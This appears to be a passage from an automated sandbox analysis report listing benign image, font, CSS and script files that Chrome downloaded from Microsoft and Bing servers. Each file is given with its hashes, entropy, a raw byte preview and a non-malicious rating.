                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3791
                                                                                                    Entropy (8bit):7.08266375441937
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                    MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                    SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                    SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                    SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............V...........^...(...........1.......f...2.......t...i...............H.......H.......GIMP 2.10.18..2020:04:16 19:04:38.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ .........7.,acspMSFT...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49911
                                                                                                    Entropy (8bit):7.994516776763163
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                    MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                    SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                    SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                    SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2501 x 832, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1771981
                                                                                                    Entropy (8bit):7.988247142332494
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:4uB7Y0eaS7xe+q6frEduiPaUU48p5fUxGVPaUZUq:bVeaSdPfmtPhU48p54qaUZ3
                                                                                                    MD5:0E10BF7B4FD04ED50A4073604A728FEF
                                                                                                    SHA1:7773AC6F48BD27CED0F82FD58A45F2C923EF87A4
                                                                                                    SHA-256:361AF6EA15689C97588C78A27C25C38C789D9E68B9400AD48B114B05FC285662
                                                                                                    SHA-512:82430B2B1C62635B876CF652FC160F295AB9AEF84D65F310C71BBCD0D44EC6359AFC4FEB70E58CCC8A19F21A2FE2C292F9FF79887C4A17532D21D2835E1624B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/m365-copilot-centric-value-consumer-0e10bf7b4f.png
                                                                                                    Preview:.PNG........IHDR.......@.............pHYs.................sRGB.........gAMA......a....bIDATx....,[~...Z.Y...>..{..#Z...DJ....)..MQB........;.a.../..~..~.-.!*.pX. C...e..Hq....F..{...U.ki....2.j..$..8.~...UY.+W....:...s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 12164, version 1.0
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):12164
                                                                                                    Entropy (8bit):7.974502474637253
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:H6HeldTaRsyn12Mg0UuCR3A6dTovEIZmiA6JWqNb6aNBPiGXoGJYrI8tTebCFFvK:aHevMsYHeeqcvpZmiA6JWwfXoIa1vpKF
                                                                                                    MD5:36AC9A2365173B647657AD829AE64FF0
                                                                                                    SHA1:F8966E2EE4C9CFE92B5843D8C27BB7BED98BDFC9
                                                                                                    SHA-256:633894CF845287F205F1B5BD26B7667DDA186695FCE3D789306F30C5FBDB14B5
                                                                                                    SHA-512:9F8C9EC9BB230D577BC751133040EF6FB78185C5310300A420E389879A7ABEE054095C60BA2A66C6FF3A7AC4FB59B7433A733FCEDDB72425D3AEB8229EF590FE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semilight.woff2
                                                                                                    Preview:wOF2....../.......[.../#........................?FFTM..&..... .`..z......X.+.....6.$.... .....p..O5l[..n...8m.Q.l....d...S..Gk.U..#.S.T...#.....>y.s[t...b...r.....M..u......x......Yj........;...a.....wGH2K.......b.q..@/..Rp.v.................'.T.lA.d.,EED..j.W....kY...e._.......N.6...(.=..0....s.8...4.((*..R.tkv.{Q..D.*.*..w.?#0.XvTD......8.. .,.......y.T....5..SBr.,h8.G.b..CQ.P...3L.4..~*.k|.X......+......mN..us7.Ksk..........|......c8@.DF^.|....!#.B.T..............2...d...2.9.=..@o.8H.2..".....V..C..{.........1.>.F....`....A.Q.:..'.#..zr.sT.P..3...K.'z.....<..L.%...V..y.i.4.;.Xv.1...N$@..n.1....._.\.x...x.x{..:..V.....[.@@..b.....@.9...-.9. :.,...,p...v..H...4..x.B..[.s..M7.X.ww............g....<...q;].'.....UUG.w....4)...Jg.Y.r65.fvn.6_7.....g.w......zU....M.RZV.M{F{.M.8._.)p.6.YwH..Ohk~0. .-.*l....A..9g..sC..}m.4...C...QJ.vP._3H{......rwn.<..3I~.v.t.+..'K....@X`..)...........I!Y.B....j.]y>........... .`.*5i..4./..../ ..T.fR.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 973 x 675, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):279269
                                                                                                    Entropy (8bit):7.994566583539726
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:RiwpUTuOsjVbgT94HFlcTY+/+T8tDtnSTFaslpolHpMerO+lMbQfVwv6p1YH:XG+jB894HFGTVw8QgGbMY
                                                                                                    MD5:8548B8B68D33DBF376420E679FC84996
                                                                                                    SHA1:7A277E16B935833A6403DEAD1CF5A7661F20DB24
                                                                                                    SHA-256:CDFE0542BE718F847059F73ABC6EF56387109AB760D5530046F2EF9EDB25ED31
                                                                                                    SHA-512:AED4FD1D6EBACFBBECBCCAE8CF4F4F13319D355723CF16F830C315884FCDE9EDAA929E5EEF78A36006FC0412AB1224AF311906883BA7391DF7165D7F3D808E00
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.............'?.k....pHYs.........&.:4....sRGB.........gAMA......a...BzIDATx...[...u...1...>..bU.b..)..).%9.":blK.,..0....v...@.h4........~k.../...:p.8.a'...u.,Z$-.WU...?g........"e.UG..<..^...c.o..E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-..'.E........^...D.....J..|.9}........)}.zq..~..Y.O_........?.....=...}..s<..?....=.q{Vy....o\.=.~t.l~??......@;..s...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 198 x 198, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54612
                                                                                                    Entropy (8bit):7.947657760882351
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:/R7tyU83PW2NChq7BJHJDaslYZ+PKAfDY6+Ian2x:p7tV83PW2NCuBtNaslE+SAfDOVS
                                                                                                    MD5:68F0A51FA86985999964EE43DE12CDD5
                                                                                                    SHA1:BBFC7666BE00C560B7394FA0B82B864237A99D8C
                                                                                                    SHA-256:F230C691E1525FAC0191E2F4A1DB36046306EB7D19808B7BF8227B7ED75E5A0F
                                                                                                    SHA-512:3049B9BD4160BFA702F2E2B6C1714C960D2C422E3481D3B6DD7006E65AA5075EED1DC9B8A2337E0501E9A7780A38718D298B2415CF30EC9E115A9360DF5FA2A7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR................]....gAMA......a.....pHYs..,J..,J.wztM....IDATx^...x.....w.m..[H!m.1.b.,.-&..p.M.n).8...8`......Lb.Y.E.........)....K...s].k.s......}.<.....pw.;....w......pw.;....w......pw.;....w......pw.;....w......pw.;....w......pw.;....AD.!R.=)X...3.....y....3..]?7e..K3...2........:.....O.:....W..$.....7.g.4...v....E.~....w.;.}....W.....i.*NM..<..oK...Q.....y...+.%..RX..U.....4...............C..>/....:.zA..}.....Z...S..c...~..U.........gF.........Twy.M..n.-xH...........?....S....3.x..{^.+......K....o.d.SR..I).....y\*.>&.{...}.J..G...#r.C.T.J.at.Q.=..z.cO.'...SR{.i..x..VjO>.^......./5..~.........oH.2..`Ag...............U.k~Pvl.O.._,.7jm.W......h.o[..=#..D.K.G.l..h...."...q.F{..utc....?@j......`..=4@....z..r..@.[..9t|.4.P.AC......G.c.p.q..:.$zZn......~^......._jn^..~..;+o]...3..t.w..Y?..pw.....{.-...E{.ZU.....-/..l~F.6?)E....-C.d.`).6P.......bg.T.J....D..7A..%J....=. u...^u(An.N.[G.....i8.(....$.....|...i9.OZN.w...K..:;...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1409 x 979, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1074513
                                                                                                    Entropy (8bit):7.992502130294777
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:24576:Z5bdLk74D3xyaSraAjS7kyTxnkExgpDUPJ2NNu:ZHL9DhZSrbjSQy1mpQPJ2q
                                                                                                    MD5:86723A74CC0FCAD23D9BF25A8EC33CAC
                                                                                                    SHA1:24579C0CD153ED5B5856520E8B91FB2A61DEE8B3
                                                                                                    SHA-256:CC6DEB15D98EE0D2F63E0FB260700C6579394AB15BC09CBB4B11ED925F701EF7
                                                                                                    SHA-512:F2D60AC241146C08FF92AD548A111F5794321FBB04F70176D8187D38D89F7862D7F3D841DBA4C8138DA7C591897050040BC39EFE3CD4ACBFF1798ACF05E0AF82
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR..............Y.s....pHYs.................sRGB.........gAMA......a...d.IDATx.....v.U...].....lM.$.-....6...6.%.....Mwg.t:C..I_CV.v.Y!.......C.p...1I....c06x.F.%.%..?}.{j.....v..~..K.e.....3T...N.S..g...`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2609 x 470, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):713010
                                                                                                    Entropy (8bit):7.987989282294461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:U/c+B7hHsXoxmtGQolRbB//k45VaX4P1g+7TX9r4FYyPxquW5:UFhOoeGQwRbB08E4P1gqN4FfP4uW5
                                                                                                    MD5:FA4FE5B56D9FAB46DB542559A3B83E37
                                                                                                    SHA1:87921556BC7E350DEF09A7CBC51465C52383428D
                                                                                                    SHA-256:9872BD2450803A2A52E862DE35CA6FA5F1684AC59174F73C7F80EADFC0B63002
                                                                                                    SHA-512:8E58F7075D015C0280DCF0845A4FD84498E738EA57232E56A152336B611E2681EFB19C5824A31203E84B92E0355AFBE2447AD3CF76AABA1B3DA431471DB4D8D4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/more-apps-copilot-centric-mreb-fa4fe5b56d.png
                                                                                                    Preview:.PNG........IHDR...1.........<.9.....pHYs.................sRGB.........gAMA......a.....IDATx..O.uGr.Vu(K.lS$1..b.0.. ."..."..|.d.u..*..,.d1...o...0...I...XY.Z.0....Hp..-K...._W...>............}...[.t..._....bfBdp.e..G)-.z...jT....v.62.rxo/.Z.U...t....6~.>.x..<.8.....-.....+.{.3.7..6..g.....4.....Z..;...Y..X/..yC...4....}..Jn.".ej.W<Sn#.3.......o.K.?/.d.C)_.....'...,.P.P.8o.f.+.?....Mu`..u.y.1..A..d..$y;a|b.Ve.....,oWr.....{....\.U.2.j..4=...?c^.Z......z)....${M>+Yb^.Y.r....0...8N.../[.7.x#.{....+..<...yQF..i.s...._E.JV.a..wY..T.6n>N..-l...=..G^.g.=.Om.r..B=.|.y.[..[.........u...~...g........._...Ch.;..m#..<.)._..................i..u.......).....=..Lk.v.....N..._.U...._.f..r........_.................L.7N...........v.........?...z..U.....;..........?.G.HnW.W.oy~...o.9..g..g......]..........G..o..V......o..F.}..Q........._}..~...v.g*....'.|b.y....M.6m.i.M.6m..{$..tj..>.L?..S.c..w..~../..B?...TF.:..>...'?.....-|.=.M......?my.{.=Y.....w.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):171505
                                                                                                    Entropy (8bit):5.043804815226508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                                    MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                    SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                    SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                    SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                    Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (10077), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):10077
                                                                                                    Entropy (8bit):5.3656127544424095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:2KchVqrW2s8uu5Mc/RiEVCqAbmGevp+1JUpqtCTHcC+FOXFvHYH7lK0f9Tk47jUB:2KchVGW2se5MKiEVwmiup9+UXRHQ7lKl
                                                                                                    MD5:BF0CCA35DCA6862F227A308A1093624F
                                                                                                    SHA1:D16DC418E22DD37A6A0D304AC9B7DB12C9A1DFA4
                                                                                                    SHA-256:43431D5B3D022E0E5B7B7EB1B1745F90E845545B909C9AB8FFB37302EAAC113D
                                                                                                    SHA-512:0226E0DF2FF18C9B6B0057F8621AE9EAA2334677232CF21F00BFE9761DF95E0430B797985347A7F6BCB7BD23B3653B1BF0443D821125DC82250F2E521F8DDDF8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/0W3EGOIt03pqDTBKybfbEsmh36Q.js
                                                                                                    Preview:var bepns=bepns||function(n,t){function ai(){var n=this;sj_be(_w,"message",ki,!1);vi();sj_evt.bind("OpenGoBigFlyout",function(){return a(null)},1);sj_evt.bind("OpenGoBigFlyoutL2",tr,1);f&&sj_be(f,"click",a,!1);sj_evt.bind("AutoOpenFlyout",function(){k=!0;p||!p&&nr()>=1200?l(r,"b_hide")?lt(n.evt,!1):w=fi:w=ei;w&&typeof LightLogger!="undefined"&&LightLogger&&LightLogger.logInstrumentationV2(null,LightLogger.InstrumentationEventType.Init,ui,!0,{SuppressionReason:w})},!0);sj_evt.bind("AutoOpenFlyoutHide",function(){i&&o(null,!0,!1)},!0);sj_evt.bind(rt,bi);sj_evt.bind("onP1",wi,1);sj_evt.bind("id:refreshed",yi,1);window.addEventListener("click",function(){o(null,!1,!0)})}var yt="redDotControl",pt="rh_meter_leaf_homepage",wt="rh_meter_leaf",bt="givemuid_heart_homepage",kt="GiveMuid",dt="GiveSerp",gt="hub_apps_698b01b4-557a-4a3b-9af7-a7e8138e8372",ni="SUCCESS",v="_RwBf",ti="aad",ii="lka",ri="lkt",g="ard",y="rwspotlight",nt="rt-chevr-nf",ui="AutoOpenFlyoutSuppression",fi="BepFlyoutMissingOrNot
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 286 x 41, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):7115
                                                                                                    Entropy (8bit):7.963812060299321
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ESBW7OKnwRKKrPq0lxbF4vMU7YzO1gR3C2Wl2:DY7PSrLprUEF3CH2
                                                                                                    MD5:747D2C674F731EDFD2779D83C8532E24
                                                                                                    SHA1:C40A635C160D4CA763D8C86F560CB937A8E1090B
                                                                                                    SHA-256:CA13C3E1EC9B3484F3E6AF002F127C03DE8E5171E76D37A5749A3CD75D098B05
                                                                                                    SHA-512:ED821EAB2956895A140C55AE7F79668F8DBB55D54408251ADED0C57200D8AD04E40DFF95EEBA79D6D149FDF82FE77F21EEEBB235EE7BC12C84A6FF0DD3CB6691
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/store-buttons-747d2c674f.png
                                                                                                    Preview:.PNG........IHDR.......).......Fw....pHYs.................sRGB.........gAMA......a....`IDATx.........G.l.$...h..D..(.J*m..HZP.....%YS.d-Q....Fv!.`..y.s.}.;wf.sg.s?..y..=...|..<.s.M.d..3...{.......sgIcL.......t..>../Y.d..ko.(..g.I.B.J....={Z......H...&o...-.X....;>s_Xr.../..pL.5j...&L.%.IJJ.8r..x....^.4h0.p..W.t.M;".....Uj.....**[.y.fQE&q.>(. .r..7'.Y.G.&M....:thO.6$#^..;..\|$.b....~.i.F...V../Y[..(`Z.l.4x..[....(....}..3$.8.....*.>b...=..F.[.u..5.6l....Cbb...4(Ae..N.:....._..a.r.E5.......(....{.W_}%...\.re...*. ..5k.Z.R.....?;.....Byx..Pa).n.........Q....G..{.....y.H6.`...s<....t.I.-.../g.y.\x.r.i.Y"....>....]Z2..n.M.V.*Y.K..D...J.#:...]t.....3.|..F.....9.cR...C."ER....+.~..G.;.<+.~P..\...G:..x..q.....o.bfp.UW.....~Xz..)D.*V.(.....}...&...[.:.,..4.$.^{....W\!......n..|..........7o../..9.h.G.....c...2e.-..&.+s..e*).'O......E.1....S..:+V....I.:u.{....~.W_}U>..C...'.h..q.<.....~..g9.O..h.1c...n.....h....f..N{...mq.v..gXk.?..Y.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2515), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2515
                                                                                                    Entropy (8bit):5.419782483013886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:X4VRGViRGbscCg/965KrMq44NI9ThJRdmXYtEjoBNuFawj1Qy0SIX0l9p:X4V4iiN/sUrMUNSFRmXY6s3uFa+0SII
                                                                                                    MD5:8FF56617CB783BC4A5CE5FE5F2F77901
                                                                                                    SHA1:30D9146F8A5C2DCADAB66C58DC906D71BBFF9D6B
                                                                                                    SHA-256:A1262E758A4CD53ECD8ADA441DF53814386BE938A8CE8C2E81ED5BC806FAFA16
                                                                                                    SHA-512:4F9B499BEE8BDC78A2DF8F95AD6DEC9FB75908BF8682BCA22E66F8A8F7118446C9E11D2705AF922FCCF6F738A1746D16DA15EBB64F6FDBD5485EDB1B7D3E7DEA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/MNkUb4pcLcratmxY3JBtcbv_nWs.js
                                                                                                    Preview:var Feedback;(function(n){function s(n,t,e,o,s){var w="thumb_t"+t,b="thumb_f"+t,k="thumb_tum"+t,c=_ge(w),l=_ge(b),v=_ge(k),d="fdbk_emotion"+t,a=_ge(d),g="thumbUpTips"+t,nt=_ge(g),tt="fdbtext_"+t,it=_ge(tt),y,p;c&&sj_be(c,"click",function(){c.classList.add("active");r(!0,a);h(l,it,nt);i(!0,t,n,o,s);c.tabIndex=-1;c.blur();c.removeAttribute("role");c.ariaDisabled="true";v&&v.focus()});l&&(sj_be(l,"click",function(){l.classList.add("active");r(!1,a);i(!1,t,n,o,s)}),sj_be(l,"keydown",function(u){u instanceof KeyboardEvent&&u.keyCode!==13||(l.classList.add("active"),r(!1,a),i(!1,t,n,o,s))}));a&&!f&&(f=!0,y=function(){var n=_d.querySelectorAll(".fdbk_emotion"),t,i,r;if(n&&n.length>0)for(t=0;t<n.length;t++)n[t].childElementCount||(i=document.createElement("img"),i.setAttribute("src","/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0"),i.classList.add("sat_img"),r=document.createElement("img"),r.setAttribute("src","/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0"),r.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):298
                                                                                                    Entropy (8bit):6.792615229750693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPKwCnFUJwf8RvG0dG9DsCJIWo+aAv+t8FvWwtbp:6v/7iwkFUJMyeHh1IX8S8Fue1
                                                                                                    MD5:0F21D94CE833C0F861617694D028CF0E
                                                                                                    SHA1:EC2639715E2031778BF874660461637EBD7BA368
                                                                                                    SHA-256:D1069BF1EEDFACE550CEC82F5C3954BCA0EA622D0BC792B173F2B1AB3D5EBFD6
                                                                                                    SHA-512:717BCF80BC5F2284EF27F97DED1E2228DCA5E7942B638EDAA7529E18F058D392277B990B182230272F393A349383660BF003E999D2C5DA3DCD8A7589C1D9E8D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.61ccb3ad-8c62-401e-b4f9-4450313deffd&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..1..0......:...I...`...E."....V...(fiK .Wo.,.o../?.....'O.v>...z..($..@..........[&....NS..C..5.....@.X..fq...r.Q.z"Z7P..Yq...8[...f8Y...\..1.oFWh.......6(..=^.p=.........j.o.....$...@......./X.D.M.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1347
                                                                                                    Entropy (8bit):7.4697680144409695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Zlfwfjp+BNJW9N5ooKufc+jJ51QPPGePW8LXEVZUceu9hs2lFHwy79MCTk:ZFwfM5Wp1fcszerN2lT/o
                                                                                                    MD5:7060EF2B0C1139C0A5220EDA2CD59E24
                                                                                                    SHA1:1D4429429DDFDB17A0DA65ECDEBFF83D1DFF5828
                                                                                                    SHA-256:EB23CFA6B86DFF86B7CDBD6525A894D93D3D9F6485D7E0D36EABA9F8B551044B
                                                                                                    SHA-512:15C52AFC342EC05B9AFEC31493F38753788AC1BB9C4F002EFA998CF964184C692D79A48456DEBDDF83C7DE899233885F783847CFD1940091784686B4CF0C75E3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OIP.nZcFAMvGV8U_7lX74D240gHaFP&w=80&h=80&c=1&vt=10&bgcl=ed1126&r=0&o=6&pid=5.1
